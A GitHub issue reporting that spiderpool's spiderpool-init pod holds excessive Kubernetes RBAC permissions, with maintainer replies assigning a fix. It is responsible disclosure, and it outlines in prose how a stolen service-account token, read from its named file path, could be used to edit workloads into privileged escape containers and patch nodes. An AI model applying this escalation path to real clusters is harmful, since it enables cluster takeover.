Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[BUG] Pod spiderpool-init has too much RBAC permission which may leads the whole cluster being hijacked #3420

Open
Yseona opened this issue Apr 29, 2024 · 4 comments
Assignees
Labels
good first issue Denotes an issue ready for a new contributor, according to the "help wanted" guidelines. kind/bug kind/feature

Comments

@Yseona
Copy link

Yseona commented Apr 29, 2024

What would you like to be added?

Hi community! Our team just found a possible security issue when reading the code. We would like to discuss whether it is a real vulnerability.

Description

The bug is that the Pod spiderpool-init in the charts has too much RBAC permission than it needs, which may cause some security problems, and the worse one leads cluster being hijacked. The problem is that the service account of spiderpool-init is bound with a shared ClusterRole spiderpool-admin(role.yaml#L5) instead of creating a separate one. This causes the spiderpool-init have the following sensitive permissions:

  • update verb of the deployments/statefulsets/daemonsets/cronjobs/replicasets/jobs resource (ClusterRole)
  • patch/update verb of the nodes resource (ClusterRole)

After reading the source code of spiderpool-init, I didn't find any Kubernetes API usages using these permissions. However, these unused permissions may have some potential risks:

  • update verb of the deployments/statefulsets/daemonsets/cronjobs/replicasets/jobs resource
    • A malicious user can create a privileged container with a malicious container image capable of container escape by editing the existing workloads. This would allow him/she gaining ROOT privilege of the worker node the created container deployed. Since the malicious user can control the pod scheduling parameters (e.g., replicas number, node affinity, …), he/she should be able to deploy the malicious container to every (or almost every) worker node. This means the malicious user will be able to control every (or almost every) worker node in the cluster.
  • patch/update verb of the nodes resource
    • This permission allows malicious users to patch all nodes in the cluster, e.g., changing their pod taints. This could help the first attack to allocate malicious containers. Also, this allows the attacker to hijack some pods with high RBAC permissions to attacker-controlled nodes.

The malicious users only need to get the service account token to perform the above attacks. There are several ways have already been reported in the real world to achieve this:

  • Supply chain attacks: Like the xz backdoor in the recent. The attacker only needs to read /var/run/secrets/kubernetes.io/serviceaccount/token.
  • RCE vulnerability in the APP: Any remote-code-execution vulnerability that can read local files can achieve this.

Mitigation Suggestion

  • Create a separate role and remove all the unnecessary permissions
  • Write Kyverno or OPA/Gatekeeper policy to:
    • Limit the container image, entrypoint and commands of newly created pods. This would effectively avoid the creation of malicious containers.
    • Restrict the securityContext of newly created pods, especially enforcing the securityContext.privileged and securityContext.allowPrivilegeEscalation to false. This would prevent the attacker from escaping the malicious container. In old Kubernetes versions, PodSecurityPolicy can also be used to achive this (it is deprecated in v1.21).

Few Questions

  • Are these permissions really unused for spiderpool-init?
  • Would these mitigation suggestions be applicable for the spiderpool?
  • Our team have also found other unneccessary permissions (which is not that sensitive as above, but could also cause some security issues). Please tell us if you are interested in it. We’ll be happy to share it or PR a fix.

References

Several CVEs had already been assigned in other projects for similar issues:

Reporter

kaaass(@kaaass )
Yseona(@Yseona )

Why is this needed?

None

How to implement it (if possible)?

None

Additional context

None

@cyclinder
Copy link
Collaborator

Hello @Yseona, Thanks for the report! It looks like this issue is duplicated with #3361.

Are you interested in fixing this? If not, I will send a PR for this!

@kaaass
Copy link

kaaass commented Apr 30, 2024

@cyclinder Hi! I'm interested in this and would be glad to PR a fix. Could I get assigned for the issue?

@cyclinder
Copy link
Collaborator

Hi @kaaass! Sure, Now I assign this to you! Feel free to ask me if you need any help. :)

@cyclinder cyclinder assigned cyclinder and kaaass and unassigned cyclinder Apr 30, 2024
@cyclinder cyclinder added the good first issue Denotes an issue ready for a new contributor, according to the "help wanted" guidelines. label Apr 30, 2024
@cyclinder
Copy link
Collaborator

Hi @kaaass, Are you still interested in fixing this issue? No push, just an ack.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
good first issue Denotes an issue ready for a new contributor, according to the "help wanted" guidelines. kind/bug kind/feature
Projects
None yet
Development

No branches or pull requests

4 participants